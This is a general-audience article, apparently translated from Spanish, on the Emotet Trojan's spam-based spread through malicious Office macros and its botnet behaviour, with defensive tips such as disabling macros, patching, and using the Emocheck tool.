A ‘mutant’ Trojan that we receive as spam in our email
After five months gone, the Emotet computer virus started again in July, having attacked 5% of companies worldwide to date. This malware infiltrates the system and steals information while trying to spread through computers connected to the same network.
In the emails with which the Emotet infection begins there is a link or a document, usually in .doc format. The text of the message usually warns that there is an unpaid invoice, or that we will receive a shipment soon, urging us to consult the attached file for more information. For some time now, criminals also resort to the coronavirus as a claim: the body of the email talks about how to avoid infection or what to do in case of being in contact with a positive case.
Enabling Office macros is opening the door to the virus
When opening the attached file, permission is requested to ‘Enable editing’. By accepting it, the user disables the security measures of Microsoft Office itself against the execution of code through macros. At other times, a link included in the email is the path used by criminals to start the infection.
The virus infects the computer in two ways: it is installed directly, or it uses the Windows PowerShell console to download itself from the attackers’ command and control (C&C) servers. If you use the latter option, criminals can install additional malware such as ‘Qakbot’, a Trojan designed to steal banking details. This ability of Emotet to install multiple modules, each with a function, makes it especially dangerous.
We are also talking about a Trojan, which opens the door to other viruses: an infection by Emotet may be only the first of many. After infecting the computer, it connects it to a botnet and uses it to send spam emails to continue spreading.
The problem that experts have found is that when sent to the contact list of an infected computer, Emotet can be made with real attachments, so that the recipient is confident: they receive something that is familiar to them from someone they already know.
How to protect yourself from Emotet
Being cautious is the best way to avoid infection. Never open the attached files or click on the link of an email that has been received from a suspicious or unknown address. Security experts such as Panda Security or the National Cybersecurity Institute (Incibe) give some additional keys for companies to avoid infection by Emotet:
■ Disable macro execution in Office by default: Do not enable a macro in an Office document unless you are completely sure of its legitimacy.
■ Keep computers up-to-date with the latest Windows patches: Emotet is one of the viruses that exploits the ‘EternalBlue’ vulnerability.
■ Recognize ‘phishing’ emails: Do not download any file of which you have the slightest suspicion or click on a link that you are not totally sure of.
■ Create strong passwords and use double authentication factor in the pages and services that offer this possibility: When Emotet infects a computer connected to a network, it tries to spread it using a list of the most common passwords.
■ Install a cybersecurity solution that detects the infection and removes it, as cleaning your computer by hand is quite difficult.
Japan’s Computer Emergency Response Team (CERT) – the equivalent of the Spanish Incibe – has made a tool called Emocheck available to any user on GitHub. To check if your computer is infected, you just have to download the corresponding version and run it.